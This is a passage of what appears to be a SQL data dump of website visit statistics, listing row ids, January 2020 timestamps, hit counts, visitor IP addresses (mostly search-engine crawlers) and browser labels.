,(473228,1578139464,1,1,0,0,'66.249.64.28','chrome'),(473229,1578139475,3,3,0,0,'66.249.64.27','chrome'),(473230,1578139865,1,1,0,0,'141.8.142.132','other'),(473231,1578140073,1,1,0,0,'66.249.70.33','chrome'),(473232,1578140075,2,2,0,0,'66.249.64.26','chrome'),(473233,1578140565,2,2,0,0,'66.249.64.28','chrome'),(473234,1578140646,1,1,0,0,'141.8.132.19','chrome'),(473235,1578141249,7,7,0,0,'66.249.64.26','chrome'),(473236,1578141307,5,5,0,0,'66.249.64.27','chrome'),(473237,1578141541,1,1,0,0,'207.46.13.182','other'),(473238,1578141578,1,1,0,0,'54.36.149.18','other'),(473239,1578141851,2,2,0,0,'66.249.64.28','chrome'),(473240,1578142443,3,3,0,0,'66.249.64.27','chrome'),(473241,1578142480,6,6,0,0,'66.249.64.26','chrome'),(473242,1578142573,2,2,0,0,'157.55.39.105','other'),(473243,1578142831,1,1,0,0,'5.45.207.44','chrome'),(473244,1578142840,1,1,0,0,'178.154.171.127','chrome'),(473245,1578142883,1,1,0,0,'141.8.183.33','chrome'),(473246,1578142885,1,1,0,0,'141.8.188.66','chrome'),(473247,1578142924,1,1,0,0,'157.55.39.123','other'),(473248,1578143059,3,3,0,0,'66.249.64.28','chrome'),(473249,1578143107,3,3,0,0,'66.249.70.62','chrome'),(473250,1578143517,1,1,0,0,'157.55.39.105','other'),(473251,1578143577,2,2,0,0,'66.249.64.26','chrome'),(473252,1578143760,1,1,0,0,'37.9.113.97','chrome'),(473253,1578143790,1,1,0,0,'141.8.188.39','chrome'),(473254,1578143796,1,1,0,0,'66.249.64.27','chrome'),(473255,1578143821,1,1,0,0,'207.46.13.182','other'),(473256,1578143881,1,1,0,0,'66.249.70.36','chrome'),(473257,1578144332,1,1,0,0,'8.29.198.26','other'),(473258,1578144659,3,1,2,0,'157.55.39.123',''),(473259,1578144789,1,1,0,0,'141.8.142.128','other'),(473260,1578144817,1,1,0,0,'37.9.113.200','other'),(473261,1578144997,3,3,0,0,'66.249.64.27','chrome'),(473262,1578145027,2,2,0,0,'66.249.64.28','chrome'),(473263,1578145494,5,5,0,0,'66.249.64.26','chrome'),(473264,1578145591,1,1,0,0,'207.46.13.182','other'),(473265,1578145608,1,1,0,0,'8.29.198.25','other'),(473266,1578145701,1,1,0,0,'157.55.39.238','other'),(473267,1578145990,1,1,0,0,'157.55.39.105','other'),(473268,1578146150,1,1,0,0,'66.249.70.33','chrome'),(473269,1578146175,3,3,0,0,'66.249.64.27','chrome'),(473270,1578146730,2,2,0,0,'66.249.64.26','chrome'),(473271,1578146809,1,1,0,0,'91.204.92.11','chrome'),(473272,1578146945,1,1,0,0,'5.45.207.65','chrome'),(473273,1578146950,1,1,0,0,'37.9.113.177','chrome'),(473274,1578147038,1,1,0,0,'178.154.171.134','chrome'),(473275,1578148015,1,1,0,0,'141.8.132.2','other'),(473276,1578148016,1,1,0,0,'66.249.70.33','chrome'),(473277,1578148019,1,1,0,0,'141.8.142.164','chrome'),(473278,1578148021,2,2,0,0,'66.249.64.26','chrome'),(473279,1578148024,1,1,0,0,'66.249.64.28','chrome'),(473280,1578148035,1,1,0,0,'141.8.142.50','chrome'),(473281,1578148066,1,1,0,0,'5.45.207.49','chrome'),(473282,1578148090,1,1,0,0,'66.249.64.27','chrome'),(473283,1578148381,1,1,0,0,'157.55.39.123','other'),(473284,1578148892,1,1,0,0,'157.55.39.238','other'),(473285,1578148999,1,1,0,0,'141.8.142.115','chrome'),(473286,1578149026,1,1,0,0,'141.8.142.119','chrome'),(473287,1578149172,6,6,0,0,'66.249.64.26','chrome'),(473288,1578149243,3,3,0,0,'66.249.64.27','chrome'),(473289,1578149285,1,0,1,0,'207.46.13.182',''),(473290,1578149295,1,1,0,0,'66.249.64.28','chrome'),(473291,1578149384,1,1,0,0,'54.36.149.8','other'),(473292,1578149814,1,0,1,0,'157.55.39.207',''),(473293,1578149963,1,1,0,0,'141.8.142.50','other'),(473294,1578150050,1,1,0,0,'141.8.183.111','chrome'),(473295,1578150052,1,1,0,0,'95.108.181.103','chrome'),(473296,1578150065,1,1,0,0,'157.55.39.123','other'),(473297,1578150370,1,1,0,0,'66.249.70.33','chrome'),(473298,1578150371,4,4,0,0,'66.249.64.28','chrome'),(473299,1578150453,7,7,0,0,'66.249.64.26','chrome'),(473300,1578150997,2,0,2,0,'157.55.39.238',''),(473301,1578151114,3,3,0,0,'66.249.64.27','chrome'),(473302,1578151547,1,1,0,0,'66.249.70.33','chrome'),(473303,1578151610,3,3,0,0,'66.249.64.28','chrome'),(473304,1578151841,3,3,0,0,'35.226.234.149','chrome'),(473305,1578151860,5,5,0,0,'34.68.76.63','chrome'),(473306,1578151885,5,5,0,0,'34.66.168.81','chrome'),(473307,1578151903,2,2,0,0,'35.226.76.211','chrome'),(473309,1578151908,1,1,0,0,'95.108.181.104','chrome'),(473310,1578151943,1,1,0,0,'95.108.213.55','other'),(473311,1578152264,3,3,0,0,'66.249.64.27','chrome'),(473312,1578152269,1,1,0,0,'66.249.64.26','chrome'),(473313,1578152889,1,1,0,0,'141.8.183.53','other'),(473314,1578152894,1,1,0,0,'141.8.183.33','chrome'),(473315,1578153349,1,1,0,0,'66.249.64.28','chrome'),(473316,1578153382,2,2,0,0,'66.249.70.33','chrome'),(473317,1578153406,1,1,0,0,'66.249.64.27','chrome'),(473318,1578154137,1,1,0,0,'91.196.178.25','chrome'),(473319,1578154556,2,2,0,0,'66.249.64.27','chrome'),(473320,1578154560,1,1,0,0,'91.196.178.39','chrome'),(473321,1578154562,1,1,0,0,'66.249.70.33','chrome'),(473322,1578154636,1,1,0,0,'157.55.39.123','other'),(473323,1578154657,2,2,0,0,'66.249.64.28','chrome'),(473324,1578155005,1,1,0,0,'95.108.213.55','chrome'),(473325,1578155157,1,1,0,0,'141.8.142.119','chrome'),(473326,1578155221,1,1,0,0,'8.29.198.27','other'),(473327,1578155852,2,0,2,0,'157.55.39.123',''),(473328,1578155873,1,0,1,0,'157.55.39.238',''),(473329,1578156048,1,1,0,0,'178.154.171.134','chrome'),(473330,1578156139,2,1,1,0,'157.55.39.238',''),(473331,1578156362,4,4,0,0,'66.249.64.27','chrome'),(473332,1578156368,3,3,0,0,'66.249.64.26','chrome'),(473333,1578156420,1,1,0,0,'54.36.149.97','other'),(473334,1578156462,1,1,0,0,'8.29.198.26','other'),(473335,1578156959,1,1,0,0,'66.249.70.36','chrome'),(473336,1578156966,2,2,0,0,'66.249.70.33','chrome'),(473337,1578157082,1,1,0,0,'178.154.171.127','chrome'),(473338,1578157093,3,3,0,0,'66.249.64.28','chrome'),(473339,1578157564,1,1,0,0,'66.249.70.62','chrome'),(473340,1578157578,6,6,0,0,'66.249.64.27','chrome'),(473341,1578157696,5,5,0,0,'66.249.64.26','chrome'),(473342,1578158124,1,1,0,0,'178.154.171.134','chrome'),(473343,1578158139,1,1,0,0,'178.154.171.127','chrome'),(473344,1578158260,2,2,0,0,'66.249.64.28','chrome'),(473345,1578159691,1,1,0,0,'185.112.13.228','other'),(473346,1578159766,1,1,0,0,'91.219.222.97','firefox'),(473347,1578160010,4,4,0,0,'66.249.64.26','chrome'),(473348,1578160040,1,1,0,0,'66.249.70.36','chrome'),(473349,1578160066,1,1,0,0,'54.36.149.42','other'),(473350,1578160357,2,2,0,0,'157.55.39.238','other'),(473351,1578160482,3,3,0,0,'178.154.171.134','chrome'),(473352,1578160486,1,1,0,0,'178.154.171.127','chrome'),(473353,1578160490,1,1,0,0,'178.154.171.134','other'),(473354,1578160584,2,2,0,0,'66.249.64.27','chrome'),(473355,1578160742,1,1,0,0,'66.249.64.28','chrome'),(473356,1578161184,1,1,0,0,'66.249.70.33','chrome'),(473357,1578161215,2,2,0,0,'66.249.64.26','chrome'),(473358,1578161230,2,2,0,0,'66.249.70.36','chrome'),(473359,1578161901,2,2,0,0,'66.249.64.27','chrome'),(473360,1578162095,1,1,0,0,'157.55.39.105','other'),(473361,1578162230,1,1,0,0,'46.219.223.25','firefox'),(473362,1578162390,1,1,0,0,'54.36.149.45','other'),(473363,1578162409,1,1,0,0,'66.249.64.28','chrome'),(473364,1578162426,2,2,0,0,'66.249.64.26','chrome'),(473365,1578162771,1,1,0,0,'178.154.171.134','chrome'),(473366,1578162901,1,1,0,0,'157.55.39.123','other'),(473367,1578163369,3,3,0,0,'157.55.39.238','other'),(473368,1578163619,2,2,0,0,'66.249.64.28','chrome'),(473369,1578163651,2,2,0,0,'95.108.181.104','chrome'),(473370,1578163716,1,1,0,0,'141.8.142.177','chrome'),(473371,1578164268,3,3,0,0,'66.249.64.26','chrome'),(473372,1578164495,2,1,1,0,'157.55.39.182',''),(473373,1578164688,1,1,0,0,'178.154.171.134','other'),(473374,1578164692,1,1,0,0,'178.154.171.134','chrome'),(473375,1578164781,1,1,0,0,'157.55.39.103','other'),(473376,1578164789,1,1,0,0,'178.154.171.127','chrome'),(473377,1578164820,1,1,0,0,'66.249.70.62','chrome'),(473378,1578164831,2,2,0,0,'66.249.64.27','chrome'),(473379,1578165409,1,1,0,0,'66.249.64.28','chrome'),(473380,1578165459,3,3,0,0,'66.249.64.26','chrome'),(473381,1578165564,1,0,1,0,'157.55.39.182',''),(473382,1578166093,1,1,0,0,'178.154.171.127','chrome'),(473383,1578166117,2,2,0,0,'157.55.39.141','other'),(473384,1578166120,1,1,0,0,'8.29.198.25','other'),(473385,1578166829,1,1,0,0,'157.55.39.103','other'),(473386,1578167319,1,1,0,0,'8.29.198.25','other'),(473387,1578167476,1,1,0,0,'178.154.171.127','chrome'),(473388,1578167839,1,1,0,0,'66.249.64.26','chrome'),(473389,1578167906,2,2,0,0,'66.249.64.27','chrome'),(473390,1578168123,1,1,0,0,'157.55.39.103','other'),(473391,1578168211,1,1,0,0,'91.196.178.87','chrome'),(473392,1578168424,1,1,0,0,'141.8.142.2','chrome'),(473393,1578168435,1,1,0,0,'141.8.183.111','chrome'),(473394,1578168470,1,1,0,0,'178.154.171.134','other'),(473395,1578168504,1,1,0,0,'66.249.70.33','chrome'),(473396,1578168524,2,2,0,0,'66.249.70.62','chrome'),(473397,1578168877,1,0,1,0,'157.55.39.141',''),(473398,1578169077,2,2,0,0,'66.249.64.26','chrome'),(473399,1578169192,2,1,1,0,'157.55.39.141',''),(473400,1578169440,2,2,0,0,'178.154.171.134','chrome'),(473401,1578169456,1,1,0,0,'178.154.171.127','chrome'),(473402,1578170383,1,1,0,0,'66.249.64.26','chrome'),(473403,1578170424,1,1,0,0,'178.154.171.134','chrome'),(473404,1578171361,1,1,0,0,'178.154.171.134','chrome'),(473405,1578171489,1,1,0,0,'66.249.64.28','chrome'),(473406,1578171496,3,3,0,0,'66.249.70.62','chrome'),(473407,1578171497,1,1,0,0,'66.249.70.33','chrome'),(473408,1578171516,1,1,0,0,'66.249.64.26','chrome'),(473409,1578171600,1,1,0,0,'157.55.39.103','other'),(473410,1578171740,1,1,0,0,'157.55.39.182','other'),(473411,1578172054,1,1,0,0,'157.55.39.141','other'),(473412,1578172071,2,2,0,0,'66.249.64.27','chrome'),(473413,1578172347,1,1,0,0,'178.154.171.127','chrome'),(473414,1578172651,3,3,0,0,'66.249.64.26','chrome'),(473415,1578172718,1,1,0,0,'66.249.70.62','chrome'),(473416,1578172805,1,1,0,0,'66.249.64.28','chrome'),(473417,1578172970,3,3,0,0,'157.55.39.141','other'),(473418,1578174515,1,1,0,0,'66.249.64.28','chrome'),(473419,1578174524,1,1,0,0,'66.249.64.27','chrome'),(473420,1578174535,4,4,0,0,'66.249.70.33','chrome'),(473421,1578174578,1,1,0,0,'66.249.70.62','chrome'),(473422,1578174593,3,3,0,0,'66.249.64.26','chrome'),(473423,1578174613,1,1,0,0,'141.8.132.2','chrome'),(473424,1578175682,2,2,0,0,'66.249.64.28','chrome'),(473425,1578175703,1,1,0,0,'66.249.64.27','chrome'),(473426,1578175750,2,2,0,0,'66.249.70.36','chrome'),(473427,1578175949,1,1,0,0,'141.8.142.119','chrome'),(473428,1578175953,1,1,0,0,'37.9.113.33','chrome'),(473429,1578176312,1,1,0,0,'66.249.70.33','chrome'),(473430,1578176315,1,1,0,0,'66.249.70.62','chrome'),(473431,1578176974,2,2,0,0,'178.154.171.134','chrome'),(473432,1578176999,1,1,0,0,'8.29.198.25','other'),(473433,1578177064,1,1,0,0,'178.154.171.127','chrome'),(473434,1578177756,2,2,0,0,'157.55.39.141','other'),(473435,1578178179,1,1,0,0,'8.29.198.26','other'),(473436,1578178491,1,1,0,0,'178.154.171.134','other'),(473437,1578178638,1,1,0,0,'91.124.175.254','chrome'),(473438,1578178668,2,2,0,0,'66.249.64.28','chrome'),(473439,1578179200,1,1,0,0,'5.45.207.49','other'),(473440,1578179227,2,2,0,0,'66.249.64.26','chrome'),(473441,1578179237,1,1,0,0,'66.249.70.62','chrome'),(473442,1578179263,1,1,0,0,'69.171.251.30','other'),(473443,1578179264,1,1,0,0,'69.171.251.29','other'),(473444,1578179848,1,1,0,0,'66.249.64.27','chrome'),(473445,1578180476,2,2,0,0,'88.99.2.203','other'),(473446,1578180494,7,7,0,0,'136.243.70.68','other'),(473447,1578181636,1,1,0,0,'141.8.132.12','chrome'),(473448,1578181654,1,1,0,0,'5.45.207.49','other'),(473449,1578181657,1,1,0,0,'141.8.142.115','chrome'),(473450,1578181663,1,1,0,0,'37.9.113.33','chrome'),(473451,1578181710,1,1,0,0,'178.154.171.127','chrome'),(473452,1578181749,2,2,0,0,'13.66.139.0','other'),(473453,1578182249,2,2,0,0,'157.55.39.182','other'),(473454,1578182271,1,1,0,0,'157.55.39.141','other'),(473455,1578182346,1,1,0,0,'3.222.177.101','chrome'),(473456,1578182691,1,1,0,0,'31.43.80.121','chrome'),(473457,1578182766,1,1,0,0,'141.8.188.12','chrome'),(473458,1578182769,1,1,0,0,'141.8.183.53','chrome'),(473459,1578182773,1,1,0,0,'5.45.207.65','chrome'),(473460,1578183502,2,2,0,0,'157.55.39.103','other'),(473461,1578183736,1,1,0,0,'178.154.171.127','chrome'),(473462,1578183865,2,2,0,0,'157.55.39.182','other'),(473463,1578184646,1,1,0,0,'141.8.142.119','chrome'),(473464,1578184650,1,1,0,0,'37.9.113.33','chrome'),(473465,1578185394,1,1,0,0,'31.13.115.11','other'),(473466,1578185546,1,1,0,0,'141.8.183.53','chrome'),(473467,1578185568,1,1,0,0,'46.133.139.99','chrome'),(473468,1578185574,1,1,0,0,'157.55.39.141','other'),(473469,1578185715,1,1,0,0,'62.205.134.182','other'),(473470,1578186022,1,1,0,0,'66.249.64.27','chrome'),(473471,1578186218,1,1,0,0,'141.8.183.33','other'),(473472,1578186360,1,1,0,0,'157.55.39.103','other'),(473473,1578186533,1,1,0,0,'37.9.113.33','chrome'),(473474,1578186562,1,1,0,0,'66.249.70.36','chrome'),(473475,1578187089,1,1,0,0,'66.249.64.26','chrome'),(473476,1578187676,1,1,0,0,'88.99.2.203','other'),(473477,1578187888,1,1,0,0,'8.29.198.26','other'),(473478,1578188009,1,1,0,0,'157.55.39.141','other'),(473479,1578188772,1,1,0,0,'87.250.224.90','chrome'),(473480,1578189045,1,1,0,0,'8.29.198.27','other'),(473481,1578189229,1,1,0,0,'54.36.149.44','other'),(473482,1578189290,2,2,0,0,'157.55.39.103','other'),(473483,1578189522,1,1,0,0,'13.66.139.0','other'),(473484,1578189774,1,1,0,0,'141.8.183.73','chrome'),(473485,1578190540,2,0,2,0,'157.55.39.141',''),(473486,1578190610,1,1,0,0,'141.8.142.177','chrome'),(473487,1578191051,1,1,0,0,'157.55.39.103','other'),(473488,1578191757,2,0,2,0,'157.55.39.182',''),(473489,1578192454,1,1,0,0,'178.154.171.134','chrome'),(473490,1578192813,1,1,0,0,'178.154.171.134','other'),(473491,1578193344,1,1,0,0,'141.8.142.50','chrome'),(473492,1578193417,1,1,0,0,'87.250.224.90','other'),(473493,1578193726,2,2,0,0,'157.55.39.141','other'),(473494,1578194300,1,1,0,0,'54.36.149.107','other'),(473495,1578194425,1,1,0,0,'141.8.142.161','chrome'),(473496,1578195392,2,0,2,0,'157.55.39.141',''),(473497,1578195415,2,2,0,0,'178.154.171.127','chrome'),(473498,1578195798,1,1,0,0,'134.249.141.83','chrome'),(473499,1578197107,1,1,0,0,'54.36.149.100','other'),(473500,1578197509,1,1,0,0,'34.222.170.58','chrome'),(473501,1578197512,1,1,0,0,'52.41.211.72','other'),(473502,1578197561,1,1,0,0,'178.154.171.127','chrome'),(473503,1578198759,1,1,0,0,'8.29.198.26','other'),(473504,1578199220,1,1,0,0,'178.154.171.127','other'),(473505,1578199916,1,1,0,0,'8.29.198.26','other'),(473506,1578200261,4,4,0,0,'157.55.39.141','other'),(473507,1578200660,1,1,0,0,'178.154.171.134','other'),(473508,1578201518,1,1,0,0,'157.55.39.141','other'),(473509,1578202783,1,1,0,0,'195.128.17.206','other'),(473510,1578203128,1,1,0,0,'62.205.134.182','other'),(473511,1578204150,1,1,0,0,'178.154.171.134','other'),(473512,1578204208,1,1,0,0,'91.196.178.131','firefox'),(473513,1578205035,1,1,0,0,'54.36.149.80','other'),(473514,1578205126,1,1,0,0,'178.154.171.134','other'),(473515,1578205935,2,2,0,0,'207.46.13.69','other'),(473516,1578206551,1,1,0,0,'66.102.9.161','chrome'),(473517,1578207633,1,1,0,0,'178.159.37.88','chrome'),(473518,1578208495,1,1,0,0,'178.154.171.134','other'),(473519,1578209227,3,3,0,0,'66.249.64.28','chrome'),(473520,1578209231,3,3,0,0,'66.249.64.26','chrome'),(473521,1578209232,3,3,0,0,'66.249.64.27','chrome'),(473522,1578209643,1,1,0,0,'8.29.198.27','other'),(473523,1578209905,2,2,0,0,'51.68.152.26','chrome'),(473524,1578210423,1,1,0,0,'176.8.56.58','chrome'),(473525,1578210485,1,0,1,0,'66.249.64.27',''),(473526,1578210772,1,1,0,0,'8.29.198.27','other'),(473527,1578211100,2,2,0,0,'207.46.13.69','other'),(473528,1578212784,1,1,0,0,'207.46.13.69','other'),(473529,1578213018,3,3,0,0,'66.249.64.26','chrome'),(473530,1578213096,1,1,0,0,'66.249.64.28','chrome'),(473531,1578214465,2,2,0,0,'91.218.15.4','chrome'),(473532,1578214850,4,4,0,0,'66.249.64.26','chrome'),(473533,1578214859,5,5,0,0,'66.249.70.62','chrome'),(473534,1578214979,2,2,0,0,'66.249.64.27','chrome'),(473535,1578215449,1,1,0,0,'66.249.64.28','chrome'),(473536,1578215945,1,1,0,0,'78.106.169.40','other'),(473537,1578216052,1,1,0,0,'66.249.64.26','chrome'),(473538,1578217136,1,1,0,0,'66.249.64.28','chrome'),(473539,1578217261,4,4,0,0,'66.249.64.27','chrome'),(473540,1578217264,3,3,0,0,'66.249.64.26','chrome'),(473541,1578217800,1,1,0,0,'94.153.102.58','chrome'),(473542,1578218154,1,1,0,0,'207.46.13.69','other'),(473543,1578218391,3,3,0,0,'66.249.64.28','chrome'),(473544,1578219067,2,2,0,0,'66.249.64.26','chrome'),(473545,1578219963,1,1,0,0,'207.46.13.69','other'),(473546,1578220000,1,1,0,0,'178.154.171.134','other'),(473547,1578220413,2,2,0,0,'66.249.64.28','chrome'),(473548,1578220501,1,1,0,0,'8.29.198.25','other'),(473549,1578220540,3,3,0,0,'66.249.64.26','chrome'),(473550,1578220542,3,3,0,0,'66.249.70.36','chrome'),(473551,1578220987,5,5,0,0,'66.249.64.27','chrome'),(473552,1578221568,3,3,0,0,'66.249.64.28','chrome'),(473553,1578221594,9,9,0,0,'66.249.64.26','chrome'),(473554,1578221614,1,1,0,0,'8.29.198.27','other'),(473555,1578222191,2,2,0,0,'66.249.64.27','chrome'),(473556,1578222637,1,1,0,0,'141.8.132.37','other'),(473557,1578222836,3,3,0,0,'66.249.64.26','chrome'),(473558,1578222841,2,2,0,0,'66.249.64.28','chrome'),(473559,1578222852,1,1,0,0,'66.249.70.36','chrome'),(473560,1578223396,1,1,0,0,'109.74.154.72','chrome'),(473561,1578223759,1,1,0,0,'207.46.13.69','other'),(473562,1578223797,1,1,0,0,'207.46.13.118','other'),(473563,1578224821,1,1,0,0,'207.46.13.69','other'),(473564,1578225122,4,4,0,0,'66.249.64.27','chrome'),(473565,1578225128,2,2,0,0,'207.46.13.29','other'),(473566,1578225256,2,2,0,0,'66.249.64.28','chrome'),(473567,1578225641,1,1,0,0,'66.249.70.62','chrome'),(473568,1578225766,13,13,0,0,'66.249.64.26','chrome'),(473569,1578226283,3,3,0,0,'66.249.64.27','chrome'),(473570,1578227030,1,1,0,0,'178.154.171.134','other'),(473571,1578227169,1,1,0,0,'93.76.93.108','chrome'),(473572,1578227743,10,10,0,0,'66.249.64.26','chrome'),(473573,1578227789,6,6,0,0,'66.249.64.27','chrome'),(473574,1578227961,5,3,2,0,'207.46.13.29',''),(473575,1578228262,2,2,0,0,'66.249.64.28','chrome'),(473576,1578228904,3,3,0,0,'66.249.64.27','chrome'),(473577,1578229084,1,1,0,0,'46.133.34.68','chrome'),(473578,1578229436,8,8,0,0,'66.249.64.26','chrome'),(473579,1578229445,1,1,0,0,'66.249.70.36','chrome'),(473580,1578229474,1,1,0,0,'66.249.70.33','chrome'),(473581,1578229476,1,1,0,0,'207.46.13.6','other'),(473582,1578229936,1,1,0,0,'66.249.64.28','chrome'),(473583,1578230037,2,2,0,0,'66.249.64.27','chrome'),(473584,1578230062,1,1,0,0,'66.249.70.62','chrome'),(473585,1578230461,1,1,0,0,'207.46.13.69','other'),(473586,1578230834,1,1,0,0,'66.249.64.26','chrome'),(473587,1578231373,1,1,0,0,'8.29.198.27','other'),(473588,1578231690,1,1,0,0,'141.8.142.2','other'),(473589,1578232485,1,1,0,0,'8.29.198.26','other'),(473590,1578232502,1,1,0,0,'66.249.64.28','chrome'),(473591,1578232892,1,0,1,0,'207.46.13.29',''),(473592,1578232894,4,1,3,0,'207.46.13.29',''),(473593,1578233809,1,1,0,0,'207.46.13.29','other'),(473594,1578234027,1,1,0,0,'31.13.115.21','other'),(473595,1578234028,1,1,0,0,'31.13.115.6','other'),(473596,1578234052,1,1,0,0,'194.213.105.8','chrome'),(473597,1578234100,1,1,0,0,'178.154.171.134','other'),(473598,1578234178,1,1,0,0,'66.249.64.28','chrome'),(473599,1578234504,1,1,0,0,'207.46.13.6','other'),(473600,1578234853,3,1,2,0,'207.46.13.69',''),(473601,1578235219,3,1,2,0,'207.46.13.29',''),(473602,1578235251,1,1,0,0,'207.46.13.69','other'),(473603,1578236032,1,1,0,0,'46.219.218.103','other'),(473604,1578236181,1,1,0,0,'178.154.171.127','other'),(473605,1578236347,1,1,0,0,'66.249.64.26','chrome'),(473606,1578236810,38,38,0,0,'34.67.43.97','firefox'),(473607,1578236814,12,12,0,0,'66.249.64.27','chrome'),(473608,1578236817,2,2,0,0,'34.67.43.97','other'),(473609,1578236947,2,2,0,0,'207.46.13.29','other'),(473610,1578237044,3,3,0,0,'66.249.70.36','chrome'),(473611,1578237121,4,4,0,0,'66.249.64.28','chrome'),(473612,1578237178,2,2,0,0,'66.249.70.62','chrome'),(473613,1578237248,1,1,0,0,'13.66.139.0','other'),(473614,1578237298,12,12,0,0,'66.249.64.26','chrome'),(473615,1578239733,2,0,2,0,'157.55.39.107',''),(473616,1578240836,2,2,0,0,'66.249.64.27','chrome'),(473617,1578241085,1,1,0,0,'66.249.64.28','chrome'),(473618,1578241103,2,0,2,0,'207.46.13.69',''),(473619,1578241583,1,1,0,0,'91.196.178.25','chrome'),(473620,1578242037,1,1,0,0,'195.114.148.165','chrome'),(473621,1578242055,1,1,0,0,'157.55.39.107','other'),(473622,1578242270,1,1,0,0,'8.29.198.26','other'),(473623,1578242394,1,1,0,0,'178.154.171.127','other'),(473624,1578242580,2,2,0,0,'66.249.64.27','chrome'),(473625,1578242685,2,0,2,0,'207.46.13.69',''),(473626,1578242724,1,1,0,0,'66.249.70.62','chrome'),(473627,1578243063,1,1,0,0,'207.46.13.69','other'),(473628,1578243155,1,1,0,0,'157.55.39.107','other'),(473629,1578243348,1,1,0,0,'8.29.198.25','other'),(473630,1578243991,1,1,0,0,'91.189.157.140','chrome'),(473631,1578244405,1,1,0,0,'178.154.171.134','other'),(473632,1578244451,1,1,0,0,'213.168.181.136','chrome'),(473633,1578246373,1,1,0,0,'66.249.64.27','chrome'),(473634,1578246531,1,1,0,0,'66.249.70.33','chrome'),(473635,1578246710,1,1,0,0,'66.249.64.26','chrome'),(473636,1578247160,1,1,0,0,'207.46.13.69','other'),(473637,1578247356,1,1,0,0,'92.106.121.14','other'),(473638,1578247527,3,3,0,0,'157.55.39.107','other'),(473639,1578247662,3,3,0,0,'207.46.13.29','other'),(473640,1578248123,1,1,0,0,'77.247.17.116','chrome'),(473641,1578248223,1,1,0,0,'46.211.133.248','chrome'),(473642,1578248296,1,1,0,0,'178.154.171.134','other'),(473643,1578248436,1,1,0,0,'157.55.39.107','other'),(473644,1578249092,1,1,0,0,'66.249.64.27','chrome'),(473645,1578249168,2,2,0,0,'66.249.64.28','chrome'),(473646,1578249763,1,1,0,0,'66.249.64.26','chrome'),(473647,1578249996,1,1,0,0,'66.249.64.27','chrome'),(473648,1578250057,1,1,0,0,'128.124.189.36','other'),(473649,1578250733,2,0,2,0,'157.55.39.107',''),(473650,1578251290,1,1,0,0,'66.249.70.36','chrome'),(473651,1578251428,1,1,0,0,'66.249.64.28','chrome'),(473652,1578251758,2,2,0,0,'66.249.64.26','chrome'),(473653,1578251985,1,1,0,0,'37.52.22.24','chrome'),(473654,1578252187,1,1,0,0,'31.4.140.94','chrome'),(473655,1578253151,1,1,0,0,'8.29.198.25','other'),(473656,1578253480,1,1,0,0,'66.249.70.36','chrome'),(473657,1578254066,2,2,0,0,'178.154.171.134','other'),(473658,1578254221,1,1,0,0,'8.29.198.25','other'),(473659,1578254541,3,3,0,0,'66.249.70.62','chrome'),(473660,1578254658,1,1,0,0,'95.133.135.227','chrome'),(473661,1578254947,2,2,0,0,'66.249.64.27','chrome'),(473662,1578255117,1,1,0,0,'66.249.64.26','chrome'),(473663,1578255236,1,1,0,0,'66.249.64.28','chrome'),(473664,1578255313,1,1,0,0,'66.249.70.36','chrome'),(473665,1578256080,3,3,0,0,'66.249.64.27','chrome'),(473666,1578256459,1,1,0,0,'46.211.159.159','chrome'),(473667,1578256552,1,1,0,0,'66.249.64.26','chrome'),(473668,1578257230,1,1,0,0,'66.249.64.27','chrome'),(473669,1578257469,1,1,0,0,'66.249.64.26','chrome'),(473670,1578257833,1,1,0,0,'207.46.13.29','other'),(473671,1578258076,2,2,0,0,'66.249.64.28','chrome'),(473672,1578258537,1,1,0,0,'207.46.13.211','other'),(473673,1578258754,1,1,0,0,'66.249.70.36','chrome'),(473674,1578258757,1,1,0,0,'66.249.64.26','chrome'),(473675,1578258800,1,1,0,0,'178.154.171.134','other'),(473676,1578259046,3,3,0,0,'66.249.64.28','chrome'),(473677,1578259963,6,6,0,0,'66.249.64.26','chrome'),(473678,1578260017,5,5,0,0,'66.249.64.27','chrome'),(473679,1578260219,1,1,0,0,'24.135.144.37','chrome'),(473680,1578260330,4,4,0,0,'66.249.64.28','chrome'),(473681,1578260573,1,1,0,0,'175.198.158.213','firefox'),(473682,1578260641,1,1,0,0,'66.249.70.62','chrome'),(473683,1578260880,2,2,0,0,'66.249.64.26','chrome'),(473684,1578260952,1,1,0,0,'66.249.64.27','chrome'),(473685,1578261781,4,4,0,0,'66.249.64.26','chrome'),(473686,1578262672,2,2,0,0,'66.249.64.28','chrome'),(473687,1578262693,2,2,0,0,'66.249.64.27','chrome'),(473688,1578262725,2,2,0,0,'207.46.13.211','other'),(473689,1578262780,1,1,0,0,'37.9.113.163','other'),(473690,1578263018,2,2,0,0,'66.249.64.26','chrome'),(473691,1578263874,2,2,0,0,'66.249.64.28','chrome'),(473692,1578264030,6,6,0,0,'66.249.64.26','chrome'),(473693,1578264038,1,1,0,0,'8.29.198.27','other'),(473694,1578264151,4,4,0,0,'66.249.64.27','chrome'),(473695,1578264275,1,1,0,0,'66.249.70.33','chrome'),(473696,1578264880,2,2,0,0,'207.46.13.211','other'),(473697,1578265072,1,1,0,0,'8.29.198.26','other'),(473698,1578265112,1,1,0,0,'178.154.171.127','other'),(473699,1578265129,2,2,0,0,'66.249.64.27','chrome'),(473700,1578265239,3,3,0,0,'91.196.178.130','chrome'),(473701,1578265390,1,1,0,0,'66.249.70.36','chrome'),(473702,1578266080,2,2,0,0,'66.249.64.27','chrome'),(473703,1578266121,1,1,0,0,'157.55.39.210','other'),(473704,1578266989,1,1,0,0,'138.246.253.5','chrome'),(473705,1578267115,1,1,0,0,'207.46.13.211','other'),(473706,1578267168,1,1,0,0,'66.249.70.33','chrome'),(473707,1578267209,1,1,0,0,'141.8.183.73','other'),(473708,1578267590,1,1,0,0,'207.46.13.29','other'),(473709,1578267619,1,1,0,0,'157.55.39.210','other'),(473710,1578267927,2,2,0,0,'66.249.64.28','chrome'),(473711,1578268242,1,1,0,0,'66.249.70.36','chrome'),(473712,1578268375,1,1,0,0,'178.154.171.134','other'),(473713,1578269138,5,5,0,0,'66.249.64.27','chrome'),(473714,1578269151,9,9,0,0,'66.249.64.26','chrome'),(473715,1578269903,3,3,0,0,'66.249.64.28','chrome'),(473716,1578270167,1,1,0,0,'66.249.64.27','chrome'),(473717,1578270298,1,1,0,0,'192.166.112.218','chrome'),(473718,1578270324,1,1,0,0,'5.102.38.15','chrome'),(473719,1578271037,3,3,0,0,'66.249.64.28','chrome'),(473720,1578271277,1,1,0,0,'207.46.13.211','other'),(473721,1578271314,5,5,0,0,'66.249.64.26','chrome'),(473722,1578271509,3,3,0,0,'66.249.64.27','chrome'),(473723,1578271877,1,1,0,0,'157.55.39.210','other'),(473724,1578272114,1,1,0,0,'62.205.134.182','other'),(473725,1578272550,2,2,0,